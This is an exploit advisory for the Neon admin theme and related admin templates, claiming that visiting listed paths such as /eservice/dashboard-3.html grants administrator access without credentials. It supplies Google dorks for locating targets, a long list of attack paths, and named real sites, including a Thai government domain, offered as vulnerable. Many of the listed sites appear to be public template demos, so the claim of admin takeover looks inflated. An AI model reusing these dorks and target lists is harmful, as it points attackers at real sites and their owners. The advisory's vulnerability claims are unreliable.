#################################################################################################
# Exploit Title : WordPress © 2015 Neon Admin Theme by Laborator.co Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/11/2018
# Vendor Homepage : laborator.co
# Tested On : Windows and Linux
# Category : WebApps
# Software Download Link [ Similar ] : github.com/sbilly/joli-admin/tree/master/joli
# Google Dorks :
intext:''© 2015 Neon Admin Theme by Laborator''
intext:''© 2014 Xenon theme by Laborator''
intext:''Copyright © 2017 PixelAdmin LLC.''
intext:''© 2016 KAIJUTHEMES''
intext:''2014 © μAdmin - Responsive Multi-Style Admin Template''
intext:''© 2016 WebAdmin - All Rights Reserved.''
intext:''Open source community - Collect from AIOS''
intext:''2016 © Minton.''
intext:''© 2017 Your Company''
# Exploit Risk : Medium
# CWE : CWE-287- [ Improper Authentication ] - CWE-284 - [ Improper Access Control ] - CWE-285 - [ Improper Authorization ]
+ CWE-269 - [ Improper Privilege Management ]
#################################################################################################
# Admin Panel Login Path :
/eservice/
No Admin Username. No Admin Password.
Ok. Successfull. Now, you are the Site Administrator.
By every targetsite, admin panel path changes.
For WordPress Panel Path :
/wp-login.php
# Exploits :
/eservice/dashboard-2.html
/eservice/dashboard-3.html
/eservice/mailbox.html
/eservice/extra-calendar.html
/eservice/skin-black.html
/eservice/skin-white.html
/eservice/skin-purple.html
/eservice/skin-cafe.html
/eservice/skin-red.html
/eservice/skin-green.html
/eservice/skin-yellow.html
/eservice/skin-blue.html
/eservice/skin-facebook.html
/eservice/highlights.html
/eservice/layout-api.html
/eservice/layout-api-right-sidebar.html
/eservice/layout-collapsed-sidebar.html
/eservice/layout-fixed-sidebar.html
/eservice/layout-chat-open.html
/eservice/layout-horizontal-menu-boxed.html
/eservice/layout-horizontal-menu-fluid.html
/eservice/layout-mixed-menus.html
/eservice/layout-right-sidebar.html
/eservice/layout-both-menus-right-sidebar.html
/eservice/layout-page-transition-fade.html
/eservice/layout-page-transition-left-in.html
/eservice/layout-page-transition-right-in.html
/eservice/layout-page-transition-fade-only.html
/eservice/layout-boxed.html
/eservice/ui-panels.html
/eservice/ui-tiles.html
/eservice/forms-buttons.html
/eservice/ui-typography.html
/eservice/ui-tabs-accordions.html
/eservice/ui-tooltips-popovers.html
/eservice/ui-navbars.html
/eservice/ui-breadcrumbs.html
/eservice/ui-badges-labels.html
/eservice/ui-progress-bars.html
/eservice/ui-modals.html
/eservice/ui-blockquotes.html
/eservice/ui-alerts.html
/eservice/ui-pagination.html
/eservice/mailbox.html
/eservice/mailbox-compose.html
/eservice/mailbox-message.html
/eservice/forms-main.html
/eservice/forms-advanced.html
/eservice/forms-wizard.html
/eservice/forms-validation.html
/eservice/forms-masks.html
/eservice/forms-sliders.html
/eservice/forms-file-upload.html
/eservice/forms-wysiwyg.html
/eservice/tables-main.html
/eservice/tables-datatable.html
/eservice/extra-icons.html
/eservice/extra-icons-entypo.html
/eservice/extra-icons-glyphicons.html
/eservice/extra-portlets.html
/eservice/extra-google-maps.html
/eservice/extra-vector-maps.html
/eservice/extra-chat-api.html
/eservice/extra-calendar.html
/eservice/extra-calendar-2.html
/eservice/extra-notes.html
/eservice/extra-lockscreen.html
/eservice/extra-register.html
/eservice/extra-invoice.html
/eservice/extra-gallery.html
/eservice/extra-gallery-single.html
/eservice/extra-members.html
/eservice/extra-profile.html
/eservice/extra-404.html
/eservice/extra-blank-page.html
/eservice/extra-timeline.html
/eservice/extra-comments.html
/eservice/extra-timeline-centered.html
/eservice/extra-tocify.html
/eservice/ui-notifications.html
/eservice/extra-new-post.html
/eservice/extra-settings.html
/eservice/extra-scrollbox.html
/eservice/extra-image-crop.html
/eservice/extra-search.html
/eservice/extra-language-selector.html
/eservice/extra-nestable.html
/eservice/extra-file-tree.html
/eservice/extra-load-progress.html
/eservice/charts.html
#################################################################################################
# Example Vulnerable Sites =>
amnat-ed.go.th/eservice/dashboard-3.html => [ Proof of Concept ] => archive.is/Uhwyr
# Example Admin Panel Login Path :
ict.amnat-ed.go.th/wp-login.php
spitalpharmazie-basel.ch/aml/extra-members.html
infinite-woodland-5276.herokuapp.com/ui-panels.html
foxythemes.net/preview/products/beagle/form-upload.html
idete.com.br/scripts/ui-panels.html
themeon.net/nifty/v2.9.1/ui-panels.html
colourcode.procoders.site/ui-panels.html
options-admin.themesease.com/ui-panels.html
jaybabani.com/ultra-admin-html/preview/ui-panels.html
uxpowered.com/products/pixeladmin/v232/html_demo/ui-panels.html
authenticgoods.co/wrapbootstrap/themes/spacelab_v1.4/ui-panels.html
portal.sitesonar.net/ui-panels.html
thinn.co.za/app/ui-panels.html
geekman.site/emphasize/ui/panels.html
swlabs.co/madmin_v1.1/code/style3/ui-panels.html
themesdesign.in/webadmin_1.1/layouts/red/ui-panels.html
dixminutes.wseils-dev.com/fileadmin/WB0048JF7/demo/ui-panels.html
tcode.me/uploads/demo/demo104/MAdmin/ui-panels.html
ui-worx.com.preview.services/Roxino/ui-panels.html
4afterworkdev.com/ui-panels.html
theme.zy62.com/ui-panels.html
geedmo.com/themes/naut/v1.4/html5jquery/dist/ui.panels.html
tumblr.teamon.eu/minton/Admin/blue_hori/ui-panels.html
ui92.com/demo/html/430/ui-panels.html
swlabs.co/madmin_v1.1/code/style3/ui-panels.html
coderthemes.com/zircos/default-boxed/ui-panels.html
demo8.chrisansgroup.com/fanatig/dashboard_customer/1/dashboard/big-bang-studio.com/cosmos/ui-panels.html
mglcloud.cn/ui-panels.html
fxbitlab.com/template/template10/ui-panels.html
themifycloud.com/demos/templates/joli/ui-panels.html
demo.thedevelovers.com/dashboard/klorofilpro-v1.6/html/ui-panels.html
ressources.kilkoa.com/PixelAdmin-1.3.0/html/ui-panels.html
aqvatarius.com/themes/atlant/html/ui-panels.html
shop.moonflyer.net/ui-panels.html
kuitao8.com/demo/20170225/20170225100041255/ui-panels.html
themeon.net/nifty/v2.8/ui-panels.html
hmelius.com/ad_outline/ui-panels.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################